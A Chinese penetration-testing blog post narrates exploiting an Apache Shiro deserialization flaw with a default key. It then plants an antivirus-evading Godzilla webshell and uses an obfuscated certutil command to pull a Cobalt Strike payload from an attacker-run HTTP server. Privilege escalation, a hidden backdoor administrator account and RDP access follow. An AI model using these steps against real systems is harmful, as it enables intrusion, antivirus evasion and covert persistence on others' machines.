实战 | Shiro漏洞到远程桌面(火绒)
【推荐学习】暗月渗透测试培训 十多年渗透经验,体系化培训渗透测试 、高效学习渗透测试,欢迎添加微信好友aptimeok 咨询。
1.在一个风和日丽早上挖掘src时浏览到了一个存在shiro框架的系统
2.看到Shirocookie果断爆破密钥
3.爆破密钥成功:Z3VucwAAAAAAAAAAAAAAAA==
利用链是CB1,回显方式是tomcat
4.上传哥斯拉webshell免杀马,因为之前的马都被火绒杀了,看到这个说明上传成功 链接:https://github.com/Tas9er/ByPassGodzilla
5.连接木马文件
Os.name: Windows Server 2008 R2 os.version: 6.1 os.arch: amd64
6.tasklist/SVC展示进程,发现火绒杀毒软件
后渗透:
1.生成cobaltstrike exe文件
2.显示上传成功实际并没有
并没有exe文件上传成功,powershell也被禁用,常规的远程下载肯定被禁止,在一筹莫展之际想到了之前遇到的这种情况
3.先对CSexe做免杀,这里使用bypassAV插件(下方),注意生成powershell2的木马,因为win2008自带
链接:https://github.com/cseroad/bypassAV
4.再使用绕过语句做远程下载(一般杀毒检测不到) “c””e””r””t””u””t””i””l”-“u””r””l””c””a””c””h””e”-split-f http://XXXX:8888/bhe.exe
5.开启服务器临时端口,把CS木马文件放在目录下会自动下载
python -m http.server 8888
6.运行免杀木马CS上线成功,目前还是administrators权限
7.利用提权插件提权到SYSTEM
8.收集内部资产
为横向移动做准备
10.添加用户到administrators组
noNetApiAdd.exe -u admin123 -p admin -g administrators
11.查看远程rdp端口,不一定是3389默认端口,为3390
远程成功
后期可以利用注册表隐藏admin123账户,实现无痕登录
原创文章,作者:mOon,如若转载,请注明出处:https://www.moonsec.com/8041.html